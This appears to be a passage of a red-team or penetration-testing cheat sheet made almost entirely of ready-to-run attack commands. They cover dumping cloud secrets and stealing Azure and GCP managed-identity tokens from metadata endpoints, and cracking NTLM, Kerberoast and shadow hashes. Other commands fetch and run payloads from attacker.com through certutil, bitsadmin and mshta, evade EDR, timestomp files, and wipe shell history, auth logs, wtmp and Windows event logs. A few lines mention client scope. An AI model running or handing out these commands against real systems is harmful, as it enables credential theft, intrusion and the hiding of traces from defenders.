run iam__enum_permissions
run iam__privesc_scan
run iam__bruteforce_permissionsDump secrets from Lambda env vars, SSM and Secrets Manager
# Lambda env vars:
aws lambda list-functions --query 'Functions[*].FunctionName'
aws lambda get-function-configuration --function-name FUNC-NAME | jq '.Environment'
# SSM Parameter Store:
aws ssm describe-parameters
aws ssm get-parameters-by-path --path "/" --recursive --with-decryption
# Secrets Manager:
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id SECRET-NAMECheck if CloudTrail is enabled and query your own activity log
aws cloudtrail describe-trails
aws cloudtrail get-trail-status --name <trail-name>
aws cloudtrail lookup-events --lookup-attributes AttributeKey=Username,AttributeValue=<user> --max-results 50Enumerate Azure subscriptions, resources and role assignments
az login --use-device-code
az account list --output table
az account get-access-token
# Resources:
az resource list --output table
# Role assignments:
az role assignment list --all --output table
# VMs:
az vm list --output table
az vm run-command invoke -g RG -n VM --command-id RunShellScript --scripts "whoami"ROADtools dumps and visualises all Azure AD / Entra ID objects — users, groups, apps, SP
pip3 install roadrecon
roadrecon auth -u user@tenant.onmicrosoft.com -p 'password'
roadrecon gather
roadrecon gui # browse at http://localhost:5000Steal managed identity token from metadata endpoint — no credentials needed
# From inside Azure VM/Function/Container:
curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -H Metadata:true
# Parse token, then:
curl -H "Authorization: Bearer $TOKEN" https://management.azure.com/subscriptions?api-version=2020-01-01Enumerate GCP projects, IAM bindings, compute instances and SA keys
gcloud auth list
gcloud projects list
gcloud iam service-accounts list
gcloud compute instances list
# Check permissions:
gcloud projects get-iam-policy PROJECT-ID
# Service account keys:
gcloud iam service-accounts keys list --iam-account SA@PROJECT.iam.gserviceaccount.comFrom SSRF on GCE/Cloud Run — steal service account OAuth2 token
# Full metadata:
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"
# Service account token:
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"Hunt for AWS/Azure/GCP keys committed to git repos — verified = actually valid
trufflehog github --org=targetorg --only-verified
trufflehog git file://. --only-verified
# Gitrob (broader search):
gitrob analyze targetorgCracking
Hashcat & John — modes, rules and strategiesAlways identify hash type before throwing compute at it
hashid '$2y$10$...'
hash-identifier
# hashcat example hashes reference:
# https://hashcat.net/wiki/doku.php?id=example_hashesNTLM mode — add rules immediately, most passwords need mutations
hashcat -m 1000 ntlm.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 1000 ntlm.hashes /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# Show cracked:
hashcat -m 1000 ntlm.hashes --showNetNTLMv2 from Responder/mitm6 captures — mode 5600
hashcat -m 5600 netntlmv2.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 5600 netntlmv2.hashes /usr/share/wordlists/rockyou.txt -r best64.ruleNetNTLMv2 cannot be passed directly — must crack or relay
TGS-REP RC4 hashes from Kerberoasting — mode 13100
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt -r best64.rule --forceAS-REP roast hashes — mode 18200
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt -r best64.ruleCommon hash mode reference — bcrypt is slow, adjust -w and expect hours
# bcrypt:
hashcat -m 3200 bcrypt.hashes /usr/share/wordlists/rockyou.txt
# MD5:
hashcat -m 0 md5.hashes /usr/share/wordlists/rockyou.txt
# SHA-256:
hashcat -m 1400 sha256.hashes /usr/share/wordlists/rockyou.txt
# SHA-512crypt (Linux shadow):
hashcat -m 1800 shadow.hashes /usr/share/wordlists/rockyou.txtRules mutate wordlist entries — capital first, append numbers, leet substitutions
# Best64 rule (fast, high hit rate):
hashcat -m 1000 hashes.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
# OneRuleToRuleThemAll (high coverage):
hashcat -m 1000 hashes.txt rockyou.txt -r OneRuleToRuleThemAll.rule
# Combinator (two wordlists merged):
hashcat -m 1000 hashes.txt -a 1 wordlist1.txt wordlist2.txtOneRuleToRuleThemAll: github.com/NotSoSecure/password_cracking_rules
Mask attack targets predictable patterns — efficient when policy is known
# ?u=upper ?l=lower ?d=digit ?s=special ?a=all printable
# 8-char: upper + lower + digit:
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?d?d
# Common pattern Password + 4 digits:
hashcat -m 1000 hashes.txt -a 3 Password?d?d?d?d
# Increment mode (try all lengths 6-10):
hashcat -m 1000 hashes.txt -a 3 --increment --increment-min 6 --increment-max 10 ?a?a?a?a?a?a?a?a?a?aJohn for Linux shadow files — use unshadow to merge passwd + shadow first
# Unshadow and crack:
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john unshadowed.txt --wordlist=/usr/share/wordlists/rockyou.txt
john unshadowed.txt --show
# Directly:
john --format=sha512crypt shadow.txt --wordlist=rockyou.txtGenerate target-specific wordlists from the website — employees use company terms
# CeWL — scrape target website for relevant words:
cewl https://target.com -d 3 -m 6 -o target-wordlist.txt
cewl https://target.com -d 2 --email -o emails.txt
# Crunch — pattern-based generation:
crunch 8 12 abcdefghijklmnopqrstuvwxyz0123456789 -o wordlist.txt
# Combine with hashcat:
hashcat -m 1000 hashes.txt target-wordlist.txt -r best64.ruleOPSEC
Stay quiet, avoid detection, clean upUse built-in Windows binaries — less likely to trigger AV/EDR signatures
# File download (no PowerShell):
certutil -urlcache -split -f http://attacker.com/file.exe C:\Temp\file.exe
bitsadmin /transfer job /download /priority normal http://attacker.com/file C:\Temp\file
# Execution without cmd.exe:
wmic process call create "C:\Temp\payload.exe"
mshta http://attacker.com/payload.hta
# Encode command:
echo -n "cmd /c whoami" | base64 # Linux
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("whoami")) # PSReference: lolbas-project.github.io — full catalogue of signed Microsoft binaries
Deep diveSlow scans stay under IDS/WAF thresholds — add jitter to avoid pattern detection
# Bash — random sleep between requests:
for ip in $(cat targets.txt); do
nmap -sV -p 80,443 $ip
sleep $((RANDOM % 30 + 10))
done
# Nuclei — rate limit + pause:
nuclei -l targets.txt -rate-limit 5 -bulk-size 5 -pause-after-first
# ffuf — delay between requests:
ffuf -w wordlist.txt -u https://target.com/FUZZ -p 0.5Route traffic through Tor — each NEWNYM signal gets a new exit node
# /etc/proxychains4.conf:
# dynamic_chain
# proxy_dns
# socks5 127.0.0.1 9050
tor &
proxychains nmap -sT -Pn -p 80,443 target.com
proxychains curl https://target.com
# Rotate per request with Tor circuit control:
echo 'signal NEWNYM' | nc 127.0.0.1 9051Tor exit nodes are publicly listed — serious ops use residential proxies instead
Prevent commands from persisting in bash history during engagement
# Disable history for current session:
unset HISTFILE
export HISTSIZE=0
# Clear existing:
history -c && history -w
cat /dev/null > ~/.bash_history
# More thorough:
ln -sf /dev/null ~/.bash_historyOther logs remain — see auth.log, syslog, auditd, /var/log/secure
Set file mtime/atime to blend in with system files and avoid forensic timeline
# Match timestamps from another file:
touch -r /bin/ls /tmp/payload.sh
# Set specific timestamp:
touch -t 202301011200.00 /tmp/payload.sh
# Verify:
stat /tmp/payload.shModify all three Windows timestamps to match legitimate system files
$file = Get-Item "C:\Temp\payload.exe"
$file.CreationTime = "01/01/2021 12:00:00"
$file.LastWriteTime = "01/01/2021 12:00:00"
$file.LastAccessTime = "01/01/2021 12:00:00"NTFS stores $STANDARD_INFORMATION and $FILE_NAME — only $SI is modified here
Know what is monitoring you before running noisy tools
# Don't: invoke-mimikatz, sekurlsa, lsass (string-matched by EDR)
# Do: use direct syscalls, process hollowing, or legitimate dump tools
# Check what AV/EDR is running:
Get-MpComputerStatus # Windows Defender
tasklist | findstr -i "defender|sentinel|crowdstrike|cylance|carbon"
# Check ETW providers (telemetry sources):
logman query providers | findstr -i "Microsoft-Windows-Threat"Scanner default UAs are blocklisted — always override with a real browser string
# Use a real browser UA:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" https://target.com
# ffuf with legit UA:
ffuf -w wordlist.txt -u https://target.com/FUZZ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Add referrer to look organic:
curl -A "Mozilla/5.0..." -H "Referer: https://www.google.com/" https://target.com/pageRemove tools and clear logs on the way out — scope-dependent, agree with client
# Remove dropped files:
shred -u /tmp/linpeas.sh /tmp/payload.elf
# Clear auth logs (root required):
echo > /var/log/auth.log
echo > /var/log/secure
# Clear wtmp/lastlog (hides login history):
echo > /var/log/wtmp
echo > /var/log/lastlog
# Remove from /tmp and check cron:
crontab -r 2>/dev/null
ls -la /tmp/ /dev/shm/Shred overwrites before delete — simple rm is recoverable. Always document what you cleaned
Clear Windows event logs and delete dropped binaries after engagement
# Delete tools:
del /f /q C:\Windows\Temp\wp.exe C:\Windows\Temp\mimikatz.exe
# Clear event logs:
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# PowerShell:
Get-EventLog -List | ForEach-Object { Clear-EventLog $_.Log }
# Remove prefetch (execution traces):
del /f /q C:\Windows\Prefetch\PAYLOAD*Log clearing itself generates event ID 1102 (Security) and 104 (System)